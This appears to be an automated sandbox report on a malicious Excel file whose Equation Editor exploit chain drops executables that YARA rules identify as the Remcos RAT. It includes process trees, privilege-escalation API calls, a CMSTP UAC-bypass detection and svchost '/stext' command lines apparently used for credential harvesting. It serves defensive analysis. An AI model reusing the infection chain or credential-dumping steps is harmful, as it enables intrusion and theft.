          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_1001719417_2_10017194
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_1000B5C117_2_1000B5C1
          Source: 202404294766578200.xlam.xlsxOLE stream indicators for Word, Excel, PowerPoint, and Visio: all false
          Source: C:\Users\user\AppData\Local\eupolyzoan\Bactris.exeCode function: String function: 0109F9F2 appears 40 times
          Source: C:\Users\user\AppData\Local\eupolyzoan\Bactris.exeCode function: String function: 010A0A30 appears 46 times
          Source: C:\Users\user\AppData\Local\eupolyzoan\Bactris.exeCode function: String function: 01089CB3 appears 31 times
          Source: C:\Windows\SysWOW64\svchost.exeCode function: String function: 00434E10 appears 54 times
          Source: C:\Windows\SysWOW64\svchost.exeCode function: String function: 00402093 appears 50 times
          Source: C:\Windows\SysWOW64\svchost.exeCode function: String function: 00434770 appears 41 times
          Source: C:\Windows\SysWOW64\svchost.exeCode function: String function: 00401E65 appears 35 times
          Source: C:\Users\user\AppData\Roaming\YED.exeCode function: String function: 00230A30 appears 36 times
          Source: C:\Users\user\AppData\Roaming\YED.exeCode function: String function: 029DC3A0 appears 34 times
          Source: C:\Users\user\AppData\Roaming\YED.exeCode function: String function: 0022F9F2 appears 40 times
          Source: C:\Users\user\AppData\Roaming\YED.exeCode function: String function: 029EFE30 appears 46 times
          Source: sheet1.xml, type: SAMPLEMatched rule: INDICATOR_XML_LegacyDrawing_AutoLoad_Document author = ditekSHen, description = detects AutoLoad documents using LegacyDrawing
          Source: 17.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
          Source: 17.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
          Source: 17.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
          Source: 16.2.Bactris.exe.2990000.1.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
          Source: 16.2.Bactris.exe.2990000.1.raw.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
          Source: 16.2.Bactris.exe.2990000.1.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
          Source: 16.2.Bactris.exe.2990000.1.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
          Source: 16.2.Bactris.exe.2990000.1.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
          Source: 16.2.Bactris.exe.2990000.1.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
          Source: 17.2.svchost.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
          Source: 17.2.svchost.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
          Source: 17.2.svchost.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
          Source: 00000011.00000002.783602919.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
          Source: 00000011.00000002.783602919.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
          Source: 00000011.00000002.783602919.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
          Source: 00000010.00000002.762640645.0000000002990000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
          Source: 00000010.00000002.762640645.0000000002990000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
          Source: 00000010.00000002.762640645.0000000002990000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
          Source: Process Memory Space: Bactris.exe PID: 3740, type: MEMORYSTRMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
          Source: Process Memory Space: svchost.exe PID: 3680, type: MEMORYSTRMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
          Source: bhvA8BE.tmp.20.drBinary or memory string: org.slneighbors
          Source: classification engineClassification label: mal100.phis.troj.spyw.expl.evad.winXLSX@35/20@6/7
          Source: C:\Users\user\AppData\Roaming\YED.exeCode function: 3_2_002837B5 GetLastError,FormatMessageW,3_2_002837B5
          Source: C:\Users\user\AppData\Roaming\YED.exeCode function: 3_2_002710BF AdjustTokenPrivileges,CloseHandle,3_2_002710BF
          Source: C:\Users\user\AppData\Roaming\YED.exeCode function: 3_2_002716C3 LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,3_2_002716C3
          Source: C:\Users\user\AppData\Local\eupolyzoan\Bactris.exeCode function: 16_2_010E10BF AdjustTokenPrivileges,CloseHandle,16_2_010E10BF
          Source: C:\Users\user\AppData\Local\eupolyzoan\Bactris.exeCode function: 16_2_010E16C3 LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,16_2_010E16C3
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_00417952 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,GetLastError,17_2_00417952
          Source: C:\Users\user\AppData\Roaming\YED.exeCode function: 3_2_002851CD SetErrorMode,GetDiskFreeSpaceExW,SetErrorMode,3_2_002851CD
          Source: C:\Users\user\AppData\Roaming\YED.exeCode function: 3_2_0029A67C CreateToolhelp32Snapshot,Process32FirstW,Process32NextW,CloseHandle,3_2_0029A67C
          Source: C:\Users\user\AppData\Roaming\YED.exeCode function: 3_2_0028648E _wcslen,CoInitialize,CoCreateInstance,CoUninitialize,3_2_0028648E
          Source: C:\Users\user\AppData\Roaming\YED.exeCode function: 3_2_002142A2 CreateStreamOnHGlobal,FindResourceExW,LoadResource,SizeofResource,LockResource,3_2_002142A2
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_0041AA4A OpenSCManagerW,OpenServiceW,CloseServiceHandle,StartServiceW,CloseServiceHandle,CloseServiceHandle,CloseServiceHandle,17_2_0041AA4A
          Source: C:\Program Files (x86)\Google\Chrome\Application\chrome.exeFile created: C:\Program Files\GoogleJump to behavior
          Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\Desktop\~$202404294766578200.xlam.xlsxJump to behavior
          Source: C:\Windows\SysWOW64\svchost.exeMutant created: \Sessions\1\BaseNamedObjects\Rmc-E70NOS
          Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\AppData\Local\Temp\CVR9397.tmpJump to behavior
          Source: C:\Windows\SysWOW64\svchost.exeSystem information queried: HandleInformationJump to behavior
          Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile read: C:\Users\desktop.iniJump to behavior
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
          Source: C:\Windows\SysWOW64\svchost.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
          Source: C:\Windows\SysWOW64\svchost.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
          Source: C:\Windows\SysWOW64\svchost.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
          Source: svchost.exe, 00000011.00000002.783884245.0000000003020000.00000040.10000000.00040000.00000000.sdmp, svchost.exe, 00000014.00000002.778834559.0000000000400000.00000040.80000000.00040000.00000000.sdmpBinary or memory string: SELECT 'INSERT INTO vacuum_db.' || quote(name) || ' SELECT * FROM main.' || quote(name) || ';' FROM vacuum_db.sqlite_master WHERE name=='sqlite_sequence';
          Source: svchost.exe, 00000011.00000002.783884245.0000000003020000.00000040.10000000.00040000.00000000.sdmp, svchost.exe, 00000011.00000002.783921365.0000000003840000.00000040.10000000.00040000.00000000.sdmp, svchost.exe, 00000014.00000002.778834559.0000000000400000.00000040.80000000.00040000.00000000.sdmp, svchost.exe, 00000015.00000002.780294367.0000000000400000.00000040.80000000.00040000.00000000.sdmpBinary or memory string: INSERT INTO %Q.%s VALUES('index',%Q,%Q,#%d,%Q);
          Source: svchost.exe, 00000011.00000002.783884245.0000000003020000.00000040.10000000.00040000.00000000.sdmp, svchost.exe, 00000014.00000002.778834559.0000000000400000.00000040.80000000.00040000.00000000.sdmpBinary or memory string: UPDATE %Q.%s SET sql = CASE WHEN type = 'trigger' THEN sqlite_rename_trigger(sql, %Q)ELSE sqlite_rename_table(sql, %Q) END, tbl_name = %Q, name = CASE WHEN type='table' THEN %Q WHEN name LIKE 'sqlite_autoindex%%' AND type='index' THEN 'sqlite_autoindex_' || %Q || substr(name,%d+18) ELSE name END WHERE tbl_name=%Q AND (type='table' OR type='index' OR type='trigger');
          Source: svchost.exe, 00000011.00000002.783884245.0000000003020000.00000040.10000000.00040000.00000000.sdmp, svchost.exe, 00000014.00000002.778834559.0000000000400000.00000040.80000000.00040000.00000000.sdmpBinary or memory string: SELECT 'INSERT INTO vacuum_db.' || quote(name) || ' SELECT * FROM main.' || quote(name) || ';'FROM main.sqlite_master WHERE type = 'table' AND name!='sqlite_sequence' AND rootpage>0
          Source: svchost.exe, 00000014.00000002.778860586.00000000005D1000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000014.00000003.778751181.000000000016E000.00000004.00000020.00020000.00000000.sdmp, chp8E2E.tmp.20.drBinary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));"
          Source: svchost.exe, 00000011.00000002.783884245.0000000003020000.00000040.10000000.00040000.00000000.sdmp, svchost.exe, 00000014.00000002.778834559.0000000000400000.00000040.80000000.00040000.00000000.sdmpBinary or memory string: UPDATE "%w".%s SET sql = sqlite_rename_parent(sql, %Q, %Q) WHERE %s;
          Source: svchost.exe, 00000011.00000002.783884245.0000000003020000.00000040.10000000.00040000.00000000.sdmp, svchost.exe, 00000014.00000002.778834559.0000000000400000.00000040.80000000.00040000.00000000.sdmpBinary or memory string: UPDATE sqlite_temp_master SET sql = sqlite_rename_trigger(sql, %Q), tbl_name = %Q WHERE %s;
          Source: svchost.exe, 00000011.00000002.783884245.0000000003020000.00000040.10000000.00040000.00000000.sdmp, svchost.exe, 00000014.00000002.778834559.0000000000400000.00000040.80000000.00040000.00000000.sdmpBinary or memory string: SELECT 'DELETE FROM vacuum_db.' || quote(name) || ';' FROM vacuum_db.sqlite_master WHERE name='sqlite_sequence'
          Source: 202404294766578200.xlam.xlsxReversingLabs: Detection: 68%
          Source: 202404294766578200.xlam.xlsxVirustotal: Detection: 50%
          Source: unknownProcess created: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE "C:\Program Files\Microsoft Office\Office14\EXCEL.EXE" /automation -Embedding
          Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE "C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess created: C:\Users\user\AppData\Roaming\YED.exe C:\Users\user\AppData\Roaming\YED.exe
          Source: unknownProcess created: C:\Program Files (x86)\Google\Chrome\Application\chrome.exe "C:\Program Files (x86)\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument http:///
          Source: C:\Program Files (x86)\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files (x86)\Google\Chrome\Application\chrome.exe "C:\Program Files (x86)\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=1364 --field-trial-handle=1452,i,15568989383610033621,8608539169459799112,131072 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
          Source: unknownProcess created: C:\Program Files (x86)\Google\Chrome\Application\chrome.exe "C:\Program Files (x86)\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument http:///
          Source: C:\Program Files (x86)\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files (x86)\Google\Chrome\Application\chrome.exe "C:\Program Files (x86)\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=892 --field-trial-handle=1396,i,13358231411772672971,2555512376125685792,131072 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
          Source: C:\Users\user\AppData\Roaming\YED.exeProcess created: C:\Users\user\AppData\Local\eupolyzoan\Bactris.exe C:\Users\user\AppData\Roaming\YED.exe
          Source: C:\Users\user\AppData\Local\eupolyzoan\Bactris.exeProcess created: C:\Windows\SysWOW64\svchost.exe C:\Users\user\AppData\Roaming\YED.exe
          Source: C:\Windows\SysWOW64\svchost.exeProcess created: C:\Windows\SysWOW64\svchost.exe C:\Windows\SysWOW64\svchost.exe /stext "C:\Users\user\AppData\Local\Temp\qcbxbnrr"
          Source: C:\Windows\SysWOW64\svchost.exeProcess created: C:\Windows\SysWOW64\svchost.exe C:\Windows\SysWOW64\svchost.exe /stext "C:\Users\user\AppData\Local\Temp\seghufctinb"
          Source: C:\Windows\SysWOW64\svchost.exeProcess created: C:\Windows\SysWOW64\svchost.exe C:\Windows\SysWOW64\svchost.exe /stext "C:\Users\user\AppData\Local\Temp\dyuauqnmwvtskce"
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess created: C:\Users\user\AppData\Roaming\YED.exe C:\Users\user\AppData\Roaming\YED.exeJump to behavior
          Source: C:\Users\user\AppData\Roaming\YED.exeProcess created: C:\Users\user\AppData\Local\eupolyzoan\Bactris.exe C:\Users\user\AppData\Roaming\YED.exeJump to behavior
          Source: C:\Program Files (x86)\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
          Source: C:\Program Files (x86)\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
          Source: C:\Program Files (x86)\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files (x86)\Google\Chrome\Application\chrome.exe "C:\Program Files (x86)\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=1364 --field-trial-handle=1452,i,15568989383610033621,8608539169459799112,131072 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8Jump to behavior
          Source: C:\Program Files (x86)\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
          Source: C:\Program Files (x86)\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
          Source: C:\Program Files (x86)\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
          Source: C:\Program Files (x86)\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
          Source: C:\Program Files (x86)\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
          Source: C:\Program Files (x86)\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
          Source: C:\Program Files (x86)\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
          Source: C:\Program Files (x86)\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
          Source: C:\Program Files (x86)\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
          Source: C:\Program Files (x86)\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
          Source: C:\Program Files (x86)\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
          Source: C:\Program Files (x86)\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
          Source: C:\Program Files (x86)\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
          Source: C:\Program Files (x86)\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files (x86)\Google\Chrome\Application\chrome.exe "C:\Program Files (x86)\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=892 --field-trial-handle=1396,i,13358231411772672971,2555512376125685792,131072 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8Jump to behavior
          Source: C:\Users\user\AppData\Local\eupolyzoan\Bactris.exeProcess created: C:\Windows\SysWOW64\svchost.exe C:\Users\user\AppData\Roaming\YED.exeJump to behavior
          Source: C:\Windows\SysWOW64\svchost.exeProcess created: C:\Windows\SysWOW64\svchost.exe C:\Windows\SysWOW64\svchost.exe /stext "C:\Users\user\AppData\Local\Temp\qcbxbnrr"Jump to behavior
          Source: C:\Windows\SysWOW64\svchost.exeProcess created: C:\Windows\SysWOW64\svchost.exe C:\Windows\SysWOW64\svchost.exe /stext "C:\Users\user\AppData\Local\Temp\seghufctinb"Jump to behavior
          Source: C:\Windows\SysWOW64\svchost.exeProcess created: C:\Windows\SysWOW64\svchost.exe C:\Windows\SysWOW64\svchost.exe /stext "C:\Users\user\AppData\Local\Temp\dyuauqnmwvtskce"Jump to behavior
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: wow64win.dllJump to behavior
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: wow64cpu.dllJump to behavior
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: msi.dllJump to behavior
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: cryptsp.dllJump to behavior
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: rpcrtremote.dllJump to behavior
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: dwmapi.dllJump to behavior
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: winhttp.dllJump to behavior
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: webio.dllJump to behavior
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: credssp.dllJump to behavior
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: dnsapi.dllJump to behavior
          Source: C:\Users\user\AppData\Roaming\YED.exeSection loaded: wow64win.dllJump to behavior
          Source: C:\Users\user\AppData\Roaming\YED.exeSection loaded: wow64cpu.dllJump to behavior
          Source: C:\Users\user\AppData\Roaming\YED.exeSection loaded: wsock32.dllJump to behavior
          Source: C:\Users\user\AppData\Roaming\YED.exeSection loaded: version.dllJump to behavior
          Source: C:\Users\user\AppData\Roaming\YED.exeSection loaded: winmm.dllJump to behavior
          Source: C:\Users\user\AppData\Roaming\YED.exeSection loaded: mpr.dllJump to behavior
          Source: C:\Users\user\AppData\Roaming\YED.exeSection loaded: iphlpapi.dllJump to behavior
          Source: C:\Users\user\AppData\Roaming\YED.exeSection loaded: winnsi.dllJump to behavior
          Source: C:\Users\user\AppData\Roaming\YED.exeSection loaded: uxtheme.dllJump to behavior
          Source: C:\Users\user\AppData\Roaming\YED.exeSection loaded: dwmapi.dllJump to behavior
          Source: C:\Users\user\AppData\Roaming\YED.exeSection loaded: cryptsp.dllJump to behavior
          Source: C:\Users\user\AppData\Local\eupolyzoan\Bactris.exeSection loaded: wow64win.dllJump to behavior
          Source: C:\Users\user\AppData\Local\eupolyzoan\Bactris.exeSection loaded: wow64cpu.dllJump to behavior
          Source: C:\Users\user\AppData\Local\eupolyzoan\Bactris.exeSection loaded: wsock32.dllJump to behavior
          Source: C:\Users\user\AppData\Local\eupolyzoan\Bactris.exeSection loaded: version.dllJump to behavior
          Source: C:\Users\user\AppData\Local\eupolyzoan\Bactris.exeSection loaded: winmm.dllJump to behavior
          Source: C:\Users\user\AppData\Local\eupolyzoan\Bactris.exeSection loaded: mpr.dllJump to behavior
          Source: C:\Users\user\AppData\Local\eupolyzoan\Bactris.exeSection loaded: iphlpapi.dllJump to behavior
          Source: C:\Users\user\AppData\Local\eupolyzoan\Bactris.exeSection loaded: winnsi.dllJump to behavior
          Source: C:\Users\user\AppData\Local\eupolyzoan\Bactris.exeSection loaded: uxtheme.dllJump to behavior
          Source: C:\Users\user\AppData\Local\eupolyzoan\Bactris.exeSection loaded: dwmapi.dllJump to behavior
          Source: C:\Windows\SysWOW64\svchost.exeSection loaded: wow64win.dllJump to behavior
          Source: C:\Windows\SysWOW64\svchost.exeSection loaded: wow64cpu.dllJump to behavior
          Source: C:\Windows\SysWOW64\svchost.exeSection loaded: winmm.dllJump to behavior
          Source: C:\Windows\SysWOW64\svchost.exeSection loaded: version.dllJump to behavior
          Source: C:\Windows\SysWOW64\svchost.exeSection loaded: shcore.dllJump to behavior
          Source: C:\Windows\SysWOW64\svchost.exeSection loaded: iphlpapi.dllJump to behavior
          Source: C:\Windows\SysWOW64\svchost.exeSection loaded: winnsi.dllJump to behavior
          Source: C:\Windows\SysWOW64\svchost.exeSection loaded: rstrtmgr.dllJump to behavior
          Source: C:\Windows\SysWOW64\svchost.exeSection loaded: ncrypt.dllJump to behavior
          Source: C:\Windows\SysWOW64\svchost.exeSection loaded: bcrypt.dllJump to behavior
          Source: C:\Windows\SysWOW64\svchost.exeSection loaded: dnsapi.dllJump to behavior
          Source: C:\Windows\SysWOW64\svchost.exeSection loaded: dhcpcsvc6.dllJump to behavior
          Source: C:\Windows\SysWOW64\svchost.exeSection loaded: dhcpcsvc.dllJump to behavior
          Source: C:\Windows\SysWOW64\svchost.exeSection loaded: rasadhlp.dllJump to behavior
          Source: C:\Windows\SysWOW64\svchost.exeSection loaded: cryptsp.dllJump to behavior
          Source: C:\Windows\SysWOW64\svchost.exeSection loaded: secur32.dllJump to behavior
          Source: C:\Windows\SysWOW64\svchost.exeSection loaded: winhttp.dllJump to behavior
          Source: C:\Windows\SysWOW64\svchost.exeSection loaded: webio.dllJump to behavior
          Source: C:\Windows\SysWOW64\svchost.exeSection loaded: nlaapi.dllJump to behavior
          Source: C:\Windows\SysWOW64\svchost.exeSection loaded: rpcrtremote.dllJump to behavior
          Source: C:\Windows\SysWOW64\svchost.exeSection loaded: wow64win.dllJump to behavior
          Source: C:\Windows\SysWOW64\svchost.exeSection loaded: wow64cpu.dllJump to behavior
          Source: C:\Windows\SysWOW64\svchost.exeSection loaded: version.dllJump to behavior
          Source: C:\Windows\SysWOW64\svchost.exeSection loaded: secur32.dllJump to behavior
          Source: C:\Windows\SysWOW64\svchost.exeSection loaded: cryptsp.dllJump to behavior
          Source: C:\Windows\SysWOW64\svchost.exeSection loaded: rpcrtremote.dllJump to behavior
          Source: C:\Windows\SysWOW64\svchost.exeSection loaded: atl.dllJump to behavior
          Source: C:\Windows\SysWOW64\svchost.exeSection loaded: wow64win.dllJump to behavior
          Source: C:\Windows\SysWOW64\svchost.exeSection loaded: wow64cpu.dllJump to behavior
          Source: C:\Windows\SysWOW64\svchost.exeSection loaded: pstorec.dllJump to behavior
